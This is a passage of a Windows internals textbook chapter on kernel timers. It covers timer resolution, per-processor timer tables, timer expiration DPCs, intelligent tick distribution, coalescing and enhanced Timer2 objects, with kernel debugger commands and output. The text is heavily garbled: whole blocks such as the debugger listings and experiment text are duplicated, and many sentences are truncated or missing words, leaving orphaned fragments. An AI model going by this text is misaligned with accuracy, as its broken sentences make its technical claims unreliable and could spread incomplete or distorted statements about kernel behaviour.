ing the causes of poor battery performance on otherwise healthy systems, as well as to decrease
overall power consumption on large systems. To obtain it, simply run powercfg /energy, and
powercfg /energy, and
powercfg /energy
energy-report.html, similar to the one shown here:
energy-report.html, similar to the one shown here:
energy-report.html
CHAPTER 8 System mechanisms
69
Scroll down to the Platform Timer Resolution section, and you see all the applications that
call. Timer resolutions are shown in hundreds of nanoseconds, so a period of 20,000 corresponds
to 2 ms. In the sample shown, two applications—namely, Microsoft Edge and the TightVNC
remote desktop server—each requested a higher resolution.
EPROCESS
+0x4a8 TimerResolutionLink : _LIST_ENTRY [ 0xfffffa80'05218fd8 - 0xfffffa80'059cd508 ]
+0x4b8 RequestedTimerResolution : 0
+0x4bc ActiveThreadsHighWatermark : 0x1d
+0x4c0 SmallestTimerResolution : 0x2710
+0x4c8 TimerResolutionStackRecord : 0xfffff8a0'0476ecd0 _PO_DIAG_STACK_RECORD
Note that the debugger shows you an additional piece of information: the smallest timer resolu-
tion that was ever requested by a given process. In this example, the process shown corresponds
to PowerPoint 2010, which typically requests a lower timer resolution during slideshows but not
during slide editing mode. The EPROCESS
this, and the stack could be parsed by dumping the PO_DIAG_STACK_RECORD structure.
TimerResolutionLink
resolution, through the ExpTimerResolutionListHead doubly linked list. Parsing this list with the
debugger data model can reveal all processes on the system that have, or had, made changes to
the timer resolution, when the powercfg command is unavailable or information on past pro-
resolution, as did the Remote Desktop Client, and Cortana. WinDbg Preview, however, now only
previously requested it but is still requesting it at the moment this command was written.
lkd> dx -g Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!ExpTimerReso
lutionListHead, "nt!_EPROCESS", "TimerResolutionLink").Select(p => new { Name = ((char*)
p.ImageFileName).ToDisplayString("sb"), Smallest = p.SmallestTimerResolution, Requested =
p.RequestedTimerResolution}),d
======================================================
= = Name = Smallest = Requested =
======================================================
= [0] - msedge.exe - 10000 - 0
=
= [1] - msedge.exe - 10000 - 0
=
= [2] - msedge.exe - 10000 - 0
=
= [3] - msedge.exe - 10000 - 0
=
= [4] - mstsc.exe - 10000 - 0
=
= [5] - msedge.exe - 10000 - 0
=
= [6] - msedge.exe - 10000 - 0
=
= [7] - msedge.exe - 10000 - 0
=
= [8] - DbgX.Shell.exe - 10000 - 10000 =
= [9] - msedge.exe - 10000 - 0
=
= [10] - msedge.exe - 10000 - 0
=
= [11] - msedge.exe - 10000 - 0
=
= [12] - msedge.exe - 10000 - 0
=
= [13] - msedge.exe - 10000 - 0
=
= [14] - msedge.exe - 10000 - 0
=
Scroll down to the Platform Timer Resolution section, and you see all the applications that
call. Timer resolutions are shown in hundreds of nanoseconds, so a period of 20,000 corresponds
to 2 ms. In the sample shown, two applications—namely, Microsoft Edge and the TightVNC
remote desktop server—each requested a higher resolution.
EPROCESS
+0x4a8 TimerResolutionLink : _LIST_ENTRY [ 0xfffffa80'05218fd8 - 0xfffffa80'059cd508 ]
+0x4b8 RequestedTimerResolution : 0
+0x4bc ActiveThreadsHighWatermark : 0x1d
+0x4c0 SmallestTimerResolution : 0x2710
+0x4c8 TimerResolutionStackRecord : 0xfffff8a0'0476ecd0 _PO_DIAG_STACK_RECORD
Note that the debugger shows you an additional piece of information: the smallest timer resolu-
tion that was ever requested by a given process. In this example, the process shown corresponds
to PowerPoint 2010, which typically requests a lower timer resolution during slideshows but not
during slide editing mode. The EPROCESS
EPROCESS
EPROCESS
this, and the stack could be parsed by dumping the PO_DIAG_STACK_RECORD structure.
TimerResolutionLink
TimerResolutionLink
TimerResolutionLink
resolution, through the ExpTimerResolutionListHead doubly linked list. Parsing this list with the
ExpTimerResolutionListHead doubly linked list. Parsing this list with the
ExpTimerResolutionListHead
debugger data model can reveal all processes on the system that have, or had, made changes to
the timer resolution, when the powercfg command is unavailable or information on past pro-
resolution, as did the Remote Desktop Client, and Cortana. WinDbg Preview, however, now only
previously requested it but is still requesting it at the moment this command was written.
lkd> dx -g Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!ExpTimerReso
lutionListHead, "nt!_EPROCESS", "TimerResolutionLink").Select(p => new { Name = ((char*)
p.ImageFileName).ToDisplayString("sb"), Smallest = p.SmallestTimerResolution, Requested =
p.RequestedTimerResolution}),d
======================================================
= = Name = Smallest = Requested =
======================================================
= [0] - msedge.exe - 10000 - 0
=
= [1] - msedge.exe - 10000 - 0
=
= [2] - msedge.exe - 10000 - 0
=
= [3] - msedge.exe - 10000 - 0
=
= [4] - mstsc.exe - 10000 - 0
=
= [5] - msedge.exe - 10000 - 0
=
= [6] - msedge.exe - 10000 - 0
=
= [7] - msedge.exe - 10000 - 0
=
= [8] - DbgX.Shell.exe - 10000 - 10000 =
= [9] - msedge.exe - 10000 - 0
=
= [10] - msedge.exe - 10000 - 0
=
= [11] - msedge.exe - 10000 - 0
=
= [12] - msedge.exe - 10000 - 0
=
= [13] - msedge.exe - 10000 - 0
=
= [14] - msedge.exe - 10000 - 0
=
70
CHAPTER 8 System mechanisms
= [15] - msedge.exe - 10000 - 0 =
= [16] - msedge.exe - 10000 - 0 =
= [17] - msedge.exe - 10000 - 0 =
= [18] - msedge.exe - 10000 - 0 =
= [19] - SearchApp.exe - 40000 - 0 =
======================================================
Timer expiration
As we said, one of the main tasks of the ISR associated with the interrupt that the clock source gener-
ates is to keep track of system time, which is mainly done by the KeUpdateSystemTime routine. Its sec-
ond job is to keep track of logical run time, such as process/thread execution times and the system tick
time, which is the underlying number used by APIs such as GetTickCount that developers use to time
operations in their applications. This part of the work is performed by KeUpdateRunTime. Before doing
any of that work, however, KeUpdateRunTime checks whether any timers have expired.
Windows timers can be either absolute timers, which implies a distinct expiration time in the future,
or relative timers, which contain a negative expiration value used as a positive offset from the current
time during timer insertion. Internally, all timers are converted to an absolute expiration time, although
the system keeps track of whether this is the “true” absolute time or a converted relative time. This dif-
ference is important in certain scenarios, such as Daylight Savings Time (or even manual clock changes).
but a relative timer—say, one set to expire “in two hours”—would not feel the effect of the clock
the kernel reprograms the absolute time associated with relative timers to match the new settings.
-
tiples, each multiple of the system time that a timer could be associated with is an index called a hand,
which is stored in the timer object's dispatcher header. Windows used that fact to organize all driver
and application timers into linked lists based on an array where each entry corresponds to a possible
multiple of the system time. Because modern versions of Windows 10 no longer necessarily run on a
periodic tick (due to the dynamic tick
46 bits of the due time (which is in 100 ns units). This gives each hand an approximate “time” of 28 ms.
hands could have expiring timers, Windows can no longer just check the current hand. Instead, a bit-
the bitmap and checked during every clock interrupt.
Regardless of method, these 256 linked lists live in what is called the timer table—which is in the
PRCB—enabling each processor to perform its own independent timer expiration without needing to
tables, for a total of 512 linked lists.
Because each processor has its own timer table, each processor also does its own timer expiration
= [15] - msedge.exe - 10000 - 0 =
= [16] - msedge.exe - 10000 - 0 =
= [17] - msedge.exe - 10000 - 0 =
= [18] - msedge.exe - 10000 - 0 =
= [19] - SearchApp.exe - 40000 - 0 =
======================================================
CHAPTER 8 System mechanisms
71
-
tion time to avoid any incoherent state. Therefore, to determine whether a clock has expired, it is only
necessary to check if there are any timers on the linked list associated with the current hand.
31
0
255
CPU 0
Timer Table
Timer Hand
0
31
0
255
CPU 1
Timer Table
Timer Hand
0
Driver
Process
Timer 1
Timer 2
Timer 3
Timer 4
FIGURE 8-19 Example of per-processor timer lists.
Although updating counters and checking a linked list are fast operations, going through every
timer and expiring it is a potentially costly operation—keep in mind that all this work is currently being
performed at CLOCK_LEVEL, an exceptionally elevated IRQL. Similar to how a driver ISR queues a DPC
draining mechanism knows timers need expiration. Likewise, when updating process/thread runtime, if
the clock ISR determines that a thread has expired its quantum, it also queues a DPC software interrupt
processing of run-time updates because each processor is running a different thread and has different
DPCs are provided primarily for device drivers, but the kernel uses them, too. The kernel most fre-
quently uses a DPC to handle quantum expiration. At every tick of the system clock, an interrupt occurs
at clock IRQL. The clock interrupt handler (running at clock IRQL) updates the system time and then
decrements a counter that tracks how long the current thread has run. When the counter reaches 0, the
priority task that should be done at DPC/dispatch IRQL. The clock interrupt handler queues a DPC to
interrupt has a lower priority than do device interrupts, any pending device interrupts that surface
before the clock interrupt completes are handled before the DPC interrupt occurs.
Once the IRQL eventually drops back to DISPATCH_LEVEL, as part of DPC processing, these two
72
CHAPTER 8 System mechanisms
TABLE 8-10
KPRCB Field
Type
Description
LastTimerHand
Index (up to 256)
The last timer hand that was processed by this processor. In recent
builds, part of TimerTable because there are now two tables.
ClockOwner
Boolean
Indicates whether the current processor is the clock owner.
TimerTable
List heads for the timer table lists (256, or 512 on more recent builds).
DpcNormalTimerExpiration
Bit
Indicates that a DISPATCH_LEVEL interrupt has been raised to request
timer expiration.
Chapter 4 of Part 1 covers the actions related to thread scheduling and quantum expiration. Here,
we look at the timer expiration work. Because the timers are linked together by hand, the expira-
tion code (executed by the DPC associated with the PRCB in the TimerExpirationDpc
KiTimerExpirationDpc) parses this list from head to tail. (At insertion time, the timers nearest to the
within this hand.) There are two primary tasks to expiring a timer:
I
The timer is treated as a dispatcher synchronization object (threads are waiting on the timer as
part of a timeout or directly as part of a wait). The wait-testing and wait-satisfaction algorithms
will be run on the timer. This work is described in a later section on synchronization in this chap-
ter. This is how user-mode applications, and some drivers, make use of timers.
I
The timer is treated as a control object associated with a DPC callback routine that executes
when the timer expires. This method is reserved only for drivers and enables very low latency
response to timer expiration. (The wait/dispatcher method requires all the extra logic of wait
signaling.) Additionally, because timer expiration itself executes at DISPATCH_LEVEL, where
DPCs also run, it is perfectly suited as a timer callback.
As each processor wakes up to handle the clock interval timer to perform system-time and run-time
processing, it therefore also processes timer expirations after a slight latency/delay in which the IRQL
drops from CLOCK_LEVEL to DISPATCH_LEVEL
-
tion processing that might occur if the processor had associated timers.
Time Interrupt
Time
Software Timer Expiration
Processor 1
Processor 0
Time
FIGURE 8-20 Timer expiration.
CHAPTER 8 System mechanisms
73
Processor selection
A critical determination that must be made when a timer is inserted is to pick the appropriate table to
timer serial-
ization is disabled. If it is, it then checks whether the timer has a DPC associated with its expiration, and
If the timer has no DPC associated with it, or if the DPC has not been bound to a processor, the kernel
-
tion on core parking, see Chapter 4 of Part 1.) If the current processor is parked, it picks the next closest
neighboring unparked processor in the same NUMA node; otherwise, the current processor is used.
This behavior is intended to improve performance and scalability on server systems that make use
of Hyper-V, although it can improve performance on any heavily loaded system. As system timers pile
with the execution of timer expiration code, which increases latency and can even cause heavy delays
or missed DPCs. Additionally, timer expiration can start competing with DPCs typically associated with
driver interrupt processing, such as network packet code, causing systemwide slowdowns. This process
is exacerbated in a Hyper-V scenario, where CPU 0 must process the timers and DPCs associated with
potentially numerous virtual machines, each with their own timers and associated devices.
-
tion load is fully distributed among unparked logical processors. The timer object stores its associated
processor number in the dispatcher header on 32-bit systems and in the object itself on 64-bit systems.
Timers Queue on CPU 0
Timers Queued on Current CPU
CPU
0
CPU
1
CPU
2
CPU
3
CPU
0
CPU
1
CPU
2
CPU
3
FIGURE 8-21 Timer queuing behaviors.
much. Additionally, it makes each timer expiration event (such as a clock tick) more complex because a
processor may have gone idle but still have had timers associated with it, meaning that the processor(s)
asynchronous behaviors in timer expiration, which may not always be desired. This complexity makes
can ultimately remain to manage the clock. Therefore, on client systems, timer serialization is enabled if
Modern Standby is available, which causes the kernel to choose CPU 0 no matter what. This allows CPU
0 to behave as the default clock owner—the processor that will always be active to pick up clock inter-
rupts (more on this later).
74
CHAPTER 8 System mechanisms
Note This behavior is controlled by the kernel variable KiSerializeTimerExpiration, which is
initialized based on a registry setting whose value is different between a server and client
installation. By modifying or creating the value SerializeTimerExpiration
other than 0 or 1, serialization can be disabled, enabling timers to be distributed among
processors. Deleting the value, or keeping it as 0, allows the kernel to make the decision
based on Modern Standby availability, and setting it to 1 permanently enables serialization
even on non-Modern Standby systems.
EXPERIMENT: Listing system timers
You can use the kernel debugger to dump all the current registered timers on the system, as well as
information on the DPC associated with each timer (if any). See the following output for a sample:
0: kd> !timer
Dump system timers
Interrupt time: 250fdc0f 00000000 [12/21/2020 03:30:27.739]
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 0 - High precision)
List Timer Interrupt Low/High Fire Time
DPC/thread
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 1 - Standard)
List Timer Interrupt Low/High Fire Time
DPC/thread
1 ffffdb08d6b2f0b0 0807e1fb 80000000 [
NEVER
] thread ffffdb08d748f480
4 ffffdb08d7837a20 6810de65 00000008 [12/21/2020 04:29:36.127]
6 ffffdb08d2cfc6b0 4c18f0d1 00000000 [12/21/2020 03:31:33.230] netbt!TimerExpiry
(DPC @ ffffdb08d2cfc670)
fffff8011fd3d8a8 A fc19cdd1 00589a19 [ 1/ 1/2100 00:00:00.054] nt!ExpCenturyDpcRoutine
(DPC @ fffff8011fd3d868)
7 ffffdb08d8640440 3b22a3a3 00000000 [12/21/2020 03:31:04.772] thread ffffdb08d85f2080
ffffdb08d0fef300 7723f6b5 00000001 [12/21/2020 03:39:54.941]
FLTMGR!FltpIrpCtrlStackProfilerTimer (DPC @ ffffdb08d0fef340)
11 fffff8011fcffe70 6c2d7643 00000000 [12/21/2020 03:32:27.052] nt!KdpTimeSlipDpcRoutine
(DPC @ fffff8011fcffe30)
ffffdb08d75f0180 c42fec8e 00000000 [12/21/2020 03:34:54.707] thread ffffdb08d75f0080
14 fffff80123475420 283baec0 00000000 [12/21/2020 03:30:33.060] tcpip!IppTimeout
(DPC @ fffff80123475460)
. . .
58 ffffdb08d863e280 P 3fec06d0 00000000 [12/21/2020 03:31:12.803] thread ffffdb08d8730080
fffff8011fd3d948 A 90eb4dd1 00000887 [ 1/ 1/2021 00:00:00.054] nt!ExpNextYearDpcRoutine
(DPC @ fffff8011fd3d908)
. . .
104 ffffdb08d27e6d78 P 25a25441 00000000 [12/21/2020 03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6d38)
ffffdb08d27e6f10 P 25a25441 00000000 [12/21/2020 03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6ed0)
106 ffffdb08d29db048 P 251210d3 00000000 [12/21/2020 03:30:27.754]
CLASSPNP!ClasspCleanupPacketTimerDpc (DPC @ ffffdb08d29db088)
EXPERIMENT: Listing system timers
You can use the kernel debugger to dump all the current registered timers on the system, as well as
information on the DPC associated with each timer (if any). See the following output for a sample:
0: kd> !timer
Dump system timers
Interrupt time: 250fdc0f 00000000 [12/21/2020 03:30:27.739]
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 0 - High precision)
List Timer Interrupt Low/High Fire Time
DPC/thread
PROCESSOR 0 (nt!_KTIMER_TABLE fffff8011bea6d80 - Type 1 - Standard)
List Timer Interrupt Low/High Fire Time
DPC/thread
1 ffffdb08d6b2f0b0 0807e1fb 80000000 [
NEVER
] thread ffffdb08d748f480
4 ffffdb08d7837a20 6810de65 00000008 [12/21/2020 04:29:36.127]
6 ffffdb08d2cfc6b0 4c18f0d1 00000000 [12/21/2020 03:31:33.230] netbt!TimerExpiry
(DPC @ ffffdb08d2cfc670)
fffff8011fd3d8a8 A fc19cdd1 00589a19 [ 1/ 1/2100 00:00:00.054] nt!ExpCenturyDpcRoutine
(DPC @ fffff8011fd3d868)
7 ffffdb08d8640440 3b22a3a3 00000000 [12/21/2020 03:31:04.772] thread ffffdb08d85f2080
ffffdb08d0fef300 7723f6b5 00000001 [12/21/2020 03:39:54.941]
FLTMGR!FltpIrpCtrlStackProfilerTimer (DPC @ ffffdb08d0fef340)
11 fffff8011fcffe70 6c2d7643 00000000 [12/21/2020 03:32:27.052] nt!KdpTimeSlipDpcRoutine
(DPC @ fffff8011fcffe30)
ffffdb08d75f0180 c42fec8e 00000000 [12/21/2020 03:34:54.707] thread ffffdb08d75f0080
14 fffff80123475420 283baec0 00000000 [12/21/2020 03:30:33.060] tcpip!IppTimeout
(DPC @ fffff80123475460)
. . .
58 ffffdb08d863e280 P 3fec06d0 00000000 [12/21/2020 03:31:12.803] thread ffffdb08d8730080
fffff8011fd3d948 A 90eb4dd1 00000887 [ 1/ 1/2021 00:00:00.054] nt!ExpNextYearDpcRoutine
(DPC @ fffff8011fd3d908)
. . .
104 ffffdb08d27e6d78 P 25a25441 00000000 [12/21/2020 03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6d38)
ffffdb08d27e6f10 P 25a25441 00000000 [12/21/2020 03:30:28.699]
tcpip!TcpPeriodicTimeoutHandler (DPC @ ffffdb08d27e6ed0)
106 ffffdb08d29db048 P 251210d3 00000000 [12/21/2020 03:30:27.754]
CLASSPNP!ClasspCleanupPacketTimerDpc (DPC @ ffffdb08d29db088)
CHAPTER 8 System mechanisms
75
fffff80122e9d110 258f6e00 00000000 [12/21/2020 03:30:28.575]
Ntfs!NtfsVolumeCheckpointDpc (DPC @ fffff80122e9d0d0)
108 fffff8011c6e6560 19b1caef 00000002 [12/21/2020 03:44:27.661]
tm!TmpCheckForProgressDpcRoutine (DPC @ fffff8011c6e65a0)
111 ffffdb08d27d5540 P 25920ab5 00000000 [12/21/2020 03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27d5580)
ffffdb08d27da540 P 25920ab5 00000000 [12/21/2020 03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27da580)
. . .
Total Timers: 221, Maximum List: 8
Current Hand: 139
In this example, which has been shortened for space reasons, there are multiple driver-
associated timers, due to expire shortly, associated with the Netbt.sys and Tcpip.sys drivers (both
related to networking), as well as Ntfs, the storage controller driver drivers. There are also back-
ground housekeeping timers due to expire, such as those related to power management, ETW,
kernel-mode timers that are used for wait dispatching. You can use !thread on the thread point-
ers to verify this.
that checks for Daylight Savings Time time-zone changes, the timer that checks for the arrival
of the upcoming year, and the timer that checks for entry into the next century. One can easily
locate them based on their typically distant expiration time, unless this experiment is performed
on the eve of one of these events.
Intelligent timer tick distribution
wakes up several times (the solid arrows) even when there are no associated expiring timers (the dotted
arrows). Although that behavior is required as long as processor 1 is running (to update the thread/pro-
cess run times and scheduling state), what if processor 1 is idle (and has no expiring timers)? Does it still
need to handle the clock interrupt? Because the only other work required that was referenced earlier is to
keeping processor (in this case, processor 0) and allow other processors to remain in their sleep state; if
they wake, any time-related adjustments can be performed by resynchronizing with processor 0.
Windows does, in fact, make this realization (internally called intelligent timer tick distribution),
to handle its expiring timers, creating a much larger gap (sleeping period). The kernel uses a variable
KiPendingTimerBitmaps
processors need to receive a clock interval for the given timer hand (clock-tick interval). It can then
fffff80122e9d110 258f6e00 00000000 [12/21/2020 03:30:28.575]
Ntfs!NtfsVolumeCheckpointDpc (DPC @ fffff80122e9d0d0)
108 fffff8011c6e6560 19b1caef 00000002 [12/21/2020 03:44:27.661]
tm!TmpCheckForProgressDpcRoutine (DPC @ fffff8011c6e65a0)
111 ffffdb08d27d5540 P 25920ab5 00000000 [12/21/2020 03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27d5580)
ffffdb08d27da540 P 25920ab5 00000000 [12/21/2020 03:30:28.592]
storport!RaidUnitPendingDpcRoutine (DPC @ ffffdb08d27da580)
. . .
Total Timers: 221, Maximum List: 8
Current Hand: 139
In this example, which has been shortened for space reasons, there are multiple driver-
associated timers, due to expire shortly, associated with the Netbt.sys and Tcpip.sys drivers (both
related to networking), as well as Ntfs, the storage controller driver drivers. There are also back-
ground housekeeping timers due to expire, such as those related to power management, ETW,
kernel-mode timers that are used for wait dispatching. You can use !thread on the thread point-
ers to verify this.
that checks for Daylight Savings Time time-zone changes, the timer that checks for the arrival
of the upcoming year, and the timer that checks for entry into the next century. One can easily
locate them based on their typically distant expiration time, unless this experiment is performed
on the eve of one of these events.
76
CHAPTER 8 System mechanisms
appropriately program the interrupt controller, as well as determine to which processors it will send an
IPI to initiate timer processing.
Time Interrupt
Time
Software Timer Expiration
Processor 1
Processor 0
Time
FIGURE 8-22 Intelligent timer tick distribution applied to processor 1.
Leaving as large a gap as possible is important due to the way power management works in proces-
sors: as the processor detects that the workload is going lower and lower, it decreases its power consump-
and enter deeper and deeper idle/sleep states, such as turning off caches. However, if the processor has
to wake again, it will consume energy and take time to power up; for this reason, processor designers will
risk entering these lower idle/sleep states (C-states) only if the time spent in a given state outweighs the
time and energy it takes to enter and exit the state. Obviously, it makes no sense to spend 10 ms to enter a
sleep state that will last only 1 ms. By preventing clock interrupts from waking sleeping processors unless
needed (due to timers), they can enter deeper C-states and stay there longer.
Timer coalescing
Although minimizing clock interrupts to sleeping processors during periods of no timer expiration
gives a big boost to longer C-state intervals, with a timer granularity of 15 ms, many timers likely will
be queued at any given hand and expire often, even if just on processor 0. Reducing the amount
of software timer-expiration work would both help to decrease latency (by requiring less work at
DISPATCH_LEVEL) as well as allow other processors to stay in their sleep states even longer. (Because
result in longer sleep times.) In truth, it is not just the number of expiring timers that really affects sleep
state (it does affect latency), but the periodicity of these timer expirations—six timers all expiring at the
same hand is a better option than six timers expiring at six different hands. Therefore, to fully optimize
idle-time duration, the kernel needs to employ a coalescing mechanism to combine separate timer
hands into an individual hand with multiple expirations.
Timer coalescing works on the assumption that most drivers and user-mode applications do not
-
-
while a driver polling every second could probably poll every second plus or minus 50 ms without too
CHAPTER 8 System mechanisms
77
and other times at half a second. Even so, not all timers are ready to be coalesced into coarser granu-
larities, so Windows enables this mechanism only for timers that have marked themselves as coales-
cable, either through the KeSetCoalescableTimer kernel API or through its user-mode counterpart,
SetWaitableTimerEx.
With these APIs, driver and application developers are free to provide the kernel with the maximum
tolerance
time past the requested period at which the timer will still function correctly. (In the previous ex-
ample, the 1-second timer had a tolerance of 50 ms.) The recommended minimum tolerance is 32 ms,
any coalescing because the expiring timer could not be moved even from one clock tick to the next.
preferred coalesc-
ing intervals: 1 second, 250 ms, 100 ms, or 50 ms.
When a tolerable delay is set for a periodic timer, Windows uses a process called shifting, which
causes the timer to drift between periods until it gets aligned to the most optimal multiple of the
is scanned, and a preferred expiration time is generated based on the closest acceptable coalescing
always pushed out as far as possible past their real expiration point, which spreads out timers as far as
possible and creates longer sleep times on the processors.
and are thus coalescable. In one scenario, Windows could decide to coalesce the timers as shown in
do for some of the clock interrupts on processor 0, possibly removing the latency of requiring a drop
to DISPATCH_LEVEL at each clock interrupt.
Time Interrupt
Time
Software Timer Expiration
Processor 1
Processor 0
Time
FIGURE 8-23 Timer coalescing.
78
CHAPTER 8 System mechanisms
Enhanced timers
Enhanced timers were introduced to satisfy a long list of requirements that previous timer system
also made timers have inconsistent expiration times, even when there was no need to reduce power (in
other words, coalescing was an all-or-nothing proposition). Second, the only mechanism in Windows
for high-resolution timers was for applications and drivers to lower the clock tick globally, which, as
these timers was now higher, they were not necessarily more precise because regular time expiration
can happen before
added features such as timer virtualization and the Desktop Activity Moderator (DAM), which actively de-
lay the expiration of timers during the resiliency phase of Modern Standby to simulate S3 sleep. However,
some key system timer activity must still be permitted to periodically run even during this phase.
These three requirements led to the creation of enhanced timers, which are also internally known as
Timer2 objects, and the creation of new system calls such as NtCreateTimer2 and NtSetTimer2, as well
as driver APIs such as ExAllocateTimer and ExSetTimer. Enhanced timers support four modes of behav-
ior, some of which are mutually exclusive:
I
No-wake This type of enhanced timer is an improvement over timer coalescing because it
provides for a tolerable delay that is only used in periods of sleep.
I
High-resolution This type of enhanced timer corresponds to a high-resolution timer with a
precise clock rate that is dedicated to it. The clock rate will only need to run at this speed when
approaching the expiration of the timer.
I
Idle-resilient This type of enhanced timer is still active even during deep sleep, such as the
resiliency phase of modern standby.
I
Finite This is the type for enhanced timers that do not share one of the previously described
properties.
“special” behavior, why create them at all? It turns out that since the new Timer2 infrastructure was a
I
It uses self-balancing red-black binary trees instead of the linked lists that form the timer table.
I
It allows drivers to specify an enable and disable callback without worrying about manually
creating DPCs.
I
It includes new, clean, ETW tracing entries for each operation, aiding in troubleshooting.
I
It provides additional security-in-depth through certain pointer obfuscation techniques and
additional assertions, hardening against data-only exploits and corruption.
CHAPTER 8 System mechanisms
79
Therefore, driver developers that are only targeting Windows 8.1 and later are highly recommended
to use the new enhanced timer infrastructure, even if they do not require the additional capabilities.
Note The documented ExAllocateTimer API does not allow drivers to create idle-resilient
timers. In fact, such an attempt crashes the system. Only Microsoft inbox drivers can
create such timers through the ExAllocateTimerInternal API. Readers are discouraged from
attempting to use this API because the kernel maintains a static, hard-coded list of every
has knowledge of how many such timers the component is allowed to create. Any violations
result in a system crash (blue screen of death).
Enhanced timers also have a more complex set of expiration rules than regular timers because they
end up having two possible due timesminimum due time-
tem clock time at which point the timer is allowed to expire. The second, maximum due time, is the lat-
est system clock time at which the timer should ever expire. Windows guarantees that the timer will ex-
pire somewhere between these two points in time, either because of a regular clock tick every interval
(such as 15 ms), or because of an ad-hoc check for timer expiration (such as the one that the idle thread
does upon waking up from an interrupt). This interval is computed by taking the expected expiration
time passed in by the developer and adjusting for the possible “no wake tolerance” that was passed in.
As such, a Timer2 object lives in potentially up to two red-black tree nodes—node 0, for the mini-
mum due time checks, and node 1, for the maximum due time checks. No-wake and high-resolution
two nodes? Instead of a single red-black tree, the system obviously needs to have more, which are
called collections
depending on the rules and combinations shown in Table 8-11.
TABLE 8-11 Timer types and node collection indices
Timer type
Node 0 collection index
Node 1 collection index
No-wake
NoWake, if it has a tolerance
NoWake, if it has a non-unlimited or no tolerance
Never inserted in this node
Finite
High-resolution
Hr, always
Finite, if it has a non-unlimited or no tolerance
Idle-resilient
NoWake, if it has a tolerance
Ir, if it has a non-unlimited or no tolerance
High-resolution & Idle-resilient
Hr, always
Ir, if it has a non-unlimited or no tolerance
Think of node 1 as the one that mirrors the default legacy timer behavior—every clock tick, check if
implies that its minimum due time is the same as its maximum due time. If it has unlimited tolerance;
80
CHAPTER 8 System mechanisms
sleeping forever.
-
posed to expire and never earlier, so node 0 is used for them. However, if their precise expiration time is
“too early” for the check in node 0, they might be in node 1 as well, at which point they are treated like
caller provided a tolerance, the system is idle, and there is an opportunity to coalesce the timer.
NoWake collec-
Hr collection other-
wise. However, on the clock tick, which checks node 1, it must be in the special Ir collection to recognize
that the timer needs to execute even though the system is in deep sleep.
-
ers to behave correctly when checked either at the system clock tick (node 1—enforcing a maximum
due time) or at the next closest due time computation (node 0—enforcing a minimum due time).
As each timer is inserted into the appropriate collection (KTIMER2_COLLECTION) and associated
next due time is updated to be the earliest due time of any timer
in the collection, whereas a global variable (KiNextTimer2Due)
timer in any collection.
EXPERIMENT: Listing enhanced system timers
which are shown at the bottom of the output:
KTIMER2s:
Address,
Due time,
Exp. Type Callback, Attributes,
ffffa4840f6070b0 1825b8f1f4 [11/30/2020 20:50:16.089] (Interrupt) [None] NWF (1826ea1ef4
[11/30/2020 20:50:18.089])
ffffa483ff903e48 1825c45674 [11/30/2020 20:50:16.164] (Interrupt) [None] NW P (27ef6380)
ffffa483fd824960 1825dd19e8 [11/30/2020 20:50:16.326] (Interrupt) [None] NWF (1828d80a68
[11/30/2020 20:50:21.326])
ffffa48410c07eb8 1825e2d9c6 [11/30/2020 20:50:16.364] (Interrupt) [None] NW P (27ef6380)
ffffa483f75bde38 1825e6f8c4 [11/30/2020 20:50:16.391] (Interrupt) [None] NW P (27ef6380)
ffffa48407108e60 1825ec5ae8 [11/30/2020 20:50:16.426] (Interrupt) [None] NWF (1828e74b68
[11/30/2020 20:50:21.426])
ffffa483f7a194a0 1825fe1d10 [11/30/2020 20:50:16.543] (Interrupt) [None] NWF (18272f4a10
[11/30/2020 20:50:18.543])
ffffa483fd29a8f8 18261691e3 [11/30/2020 20:50:16.703] (Interrupt) [None] NW P (11e1a300)
ffffa483ffcc2660 18261707d3 [11/30/2020 20:50:16.706] (Interrupt) [None] NWF (18265bd903
[11/30/2020 20:50:17.157])
ffffa483f7a19e30 182619f439 [11/30/2020 20:50:16.725] (Interrupt) [None] NWF (182914e4b9
[11/30/2020 20:50:21.725])
ffffa483ff9cfe48 182745de01 [11/30/2020 20:50:18.691] (Interrupt) [None] NW P (11e1a300)
ffffa483f3cfe740 18276567a9 [11/30/2020 20:50:18.897] (Interrupt)
Wdf01000!FxTimer::_FxTimerExtCallbackThunk (Context @ ffffa483f3db7360) NWF
(1827fdfe29 [11/30/2020 20:50:19.897]) P (02faf080)
EXPERIMENT: Listing enhanced system timers
which are shown at the bottom of the output:
KTIMER2s:
Address,
Due time,
Exp. Type Callback, Attributes,
ffffa4840f6070b0 1825b8f1f4 [11/30/2020 20:50:16.089] (Interrupt) [None] NWF (1826ea1ef4
[11/30/2020 20:50:18.089])
ffffa483ff903e48 1825c45674 [11/30/2020 20:50:16.164] (Interrupt) [None] NW P (27ef6380)
ffffa483fd824960 1825dd19e8 [11/30/2020 20:50:16.326] (Interrupt) [None] NWF (1828d80a68
[11/30/2020 20:50:21.326])
ffffa48410c07eb8 1825e2d9c6 [11/30/2020 20:50:16.364] (Interrupt) [None] NW P (27ef6380)
ffffa483f75bde38 1825e6f8c4 [11/30/2020 20:50:16.391] (Interrupt) [None] NW P (27ef6380)
ffffa48407108e60 1825ec5ae8 [11/30/2020 20:50:16.426] (Interrupt) [None] NWF (1828e74b68
[11/30/2020 20:50:21.426])
ffffa483f7a194a0 1825fe1d10 [11/30/2020 20:50:16.543] (Interrupt) [None] NWF (18272f4a10
[11/30/2020 20:50:18.543])
ffffa483fd29a8f8 18261691e3 [11/30/2020 20:50:16.703] (Interrupt) [None] NW P (11e1a300)
ffffa483ffcc2660 18261707d3 [11/30/2020 20:50:16.706] (Interrupt) [None] NWF (18265bd903
[11/30/2020 20:50:17.157])
ffffa483f7a19e30 182619f439 [11/30/2020 20:50:16.725] (Interrupt) [None] NWF (182914e4b9
[11/30/2020 20:50:21.725])
